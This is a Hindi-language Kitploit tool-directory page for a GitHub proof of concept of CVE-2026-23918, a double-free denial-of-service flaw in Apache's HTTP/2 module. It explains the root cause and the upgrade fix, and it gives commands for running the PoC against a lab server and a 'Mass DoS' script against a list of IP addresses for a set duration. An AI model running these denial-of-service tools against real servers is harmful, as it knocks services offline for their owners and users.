Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-23918 — Apache HTTP/2 डबल-फ्री भेद्यता PoC (CVE-2026-23918) | Kitploit
उपकरण/GitHubGitHub/rhasan-com/cve-2026-23918
भेद्यता विश्लेषणशोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubrhasan-com/cve-2026-23918

CVE-2026-23918

Apache HTTP/2 डबल-फ्री भेद्यता PoC (CVE-2026-23918)

रिपॉजिटरी देखें
834 महीने पहलेअभी तक समीक्षित नहीं
वेबसाइट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-23918: Apache HTTP/2 Double-Free DoS

CVE-2026-23918 Apache 2.4.66 DoS PoC Python 3

CVE-2026-23918 | Apache HTTP Server 2.4.66 | CWE-415: Double Free | CVSS 8.8 | 2.4.67 में ठीक किया गया

mod_http2 (h2_mplx.c) में एक double-free भेद्यता दूरस्थ हमलावरों को तीव्र RST_STREAM फ्रेम्स के माध्यम से सेवा से वंचित (worker crash) करने की अनुमति देती है, जो c1c2_stream_joined() और m_stream_cleanup() के बीच race condition को ट्रिगर करते हैं।


त्वरित प्रारंभ

root@kitploit:~
# 1. Start the lab
docker-compose up --build -d

# 2. Run the PoC
pip3 install h2
python3 poc.py --target 127.0.0.1 --port 8443

# 3. Watch the crash
docker logs -f apache-lab

# 4. Clean up
docker-compose down -v

परिणाम: सर्वर ~30s–3min में SIGSEGV के साथ क्रैश होता है — विश्वसनीय DoS की पुष्टि हुई।


एक्सप्लॉइट

फ़ाइलविवरण
poc.pyRapid-RST — तेज़ हमला, 30s–3min में सर्वर क्रैश करता है
exploits/slow-drip.pySlow Drip — कम-बैंडविड्थ निरंतर हमला
exploits/mass-dos.pyMass DoS — बहु-लक्ष्य निरंतर DoS

Mass DoS उपयोग

root@kitploit:~
# Create target list
echo "192.168.1.100:8443" > targets.txt
echo "10.0.0.50:8443" >> targets.txt

# Attack 10 targets for 30 minutes
python3 exploits/mass-dos.py --targets targets.txt --duration 30 --workers 50 --intensity 7

यह क्या एक्सप्लॉइट करता है

भेद्यता तब ट्रिगर होती है जब:

  1. एक स्ट्रीम को c1c2_stream_joined() और m_stream_cleanup() दोनों द्वारा एक साथ जोड़ा जाता है
  2. दोनों बिना डीडुप्लिकेशन के समान स्ट्रीम को m->spurge में जोड़ते हैं
  3. h2_purge_then_destroy() स्ट्रीम को दो बार नष्ट करता है → double-free → segfault
छवि

शमन

Apache 2.4.67 या बाद के संस्करण में अपग्रेड करें।

  • NVD — CVE-2026-23918
  • Apache सुरक्षा सलाह

गहन विश्लेषण

पूर्ण भेद्यता विश्लेषण, रूट कॉज़ वॉकथ्रू, एक्सप्लॉइटेशन नोट्स, और निवारण मार्गदर्शन: → rhasan.com/CVE-2026-23918


श्रेय

खोजकर्ताBartlomiej Dmitruk (striga.ai) · Stanislaw Strzalkowski (isec.pl)
रिपोर्ट किया गया2025-12-10
ठीक किया गयाApache 2.4.67

संदर्भ

  • CWE-415: Double Free
  • oss-sec ML

⭐ इस रिपॉजिटरी को स्टार करें यदि आपको यह उपयोगी लगा!

स्टार्स

Stargazers over time

टूल डाउनलोड करें